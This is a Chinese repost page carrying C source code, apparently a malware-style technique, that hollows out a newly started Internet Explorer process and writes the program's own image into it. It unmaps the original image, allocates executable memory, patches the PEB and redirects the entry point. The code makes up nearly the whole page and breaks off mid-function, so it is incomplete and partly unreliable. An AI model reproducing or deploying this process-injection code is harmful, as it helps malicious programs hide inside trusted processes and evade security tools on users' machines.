把自身插入到IE进程里的代码的办法[网络技术]
本文“把自身插入到IE进程里的代码的办法[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ntdll.lib")
typedef long NTSTATUS;
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
HANDLE ProcessHandle,
PVOID BaseAddress
);
typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress;
DWORD dwReserve;
} CHILDPROCESS;
char szIePath[MAX_PATH];
BOOL FindIePath(char *IePath,int *dwBuffSize);
BOOL InjectProcess(void);
DWORD GetSelfImageSize(HMODULE hModule);
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
);
int main(void)
{
if (InjectProcess() )
{
printf("This is my a test code,made by shadow3.\r\n");
}
else
{
MessageBox(NULL,"进程插入完成","Text",MB_OK);
}
return 0;
}
BOOL FindIePath(char *IePath,int *dwBuffSize)
{
char szSystemDir[MAX_PATH];
GetSystemDirectory(szSystemDir,MAX_PATH);
szSystemDir[2] = '\0';
lstrcat(szSystemDir,"\\ProgramFiles\\Internet Explorer\\iexplore.exe");
lstrcpy(IePath, szSystemDir);
return TRUE;
}
BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];
DWORD dwImageSize = 0;
STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD *PPEB;
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;
HMODULE hModule = NULL;
ZeroMemory(szModulePath,MAX_PATH);
ZeroMemory(szIePath,MAX_PATH);
GetModuleFileName(NULL,szModulePath,MAX_PATH);
FindIePath(szIePath,NULL);
if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
return FALSE;
}
hModule = GetModuleHandle(NULL);
if ( hModule == NULL )
{
return FALSE;
}
pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
dwImageSize = GetSelfImageSize(hModule);
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess) )
{
printf("CHILD PID: [%d]\r\n",pi.dwProcessId);
if ( ZwUnmapViewOfSection(
pi.hProcess,
(LPVOID)stChildProcess.dwBaseAddress
) == 0 )
{
lpVirtual = VirtualAllocEx(
pi.hProcess,
(LPVOID)hModule,
dwImageSize,
MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE
);
if ( lpVirtual )
{
printf("Unmapped and Allocated Mem Success.\r\n");
}
}
else
{
printf("ZwUnmapViewOfSection() failed.\r\n");
return TRUE;
}
if ( lpVirtual )
{
PPEB = (DWORD *)ThreadCxt.Ebx;
// 重写装载地址
WriteProcessMemory(
pi.hProcess,
&PPEB[2],
&lpVirtual,
sizeof(DWORD),
&dwWrite
);
if ( WriteProcessMemory(
pi.hProcess,
lpVirtual,
hModule,
dwImageSize,
&dwWrite) )
{
printf("image inject into process success.\r\n");
ThreadCxt.ContextFlags = CONTEXT_FULL;
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
{
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
else
{
ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
#ifdef DEBUG
以上是“把自身插入到IE进程里的代码的办法[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“把自身插入到IE进程里的代码的办法”更多相关内容
中查找“把自身插入到IE进程里的代码的办法”更多相关内容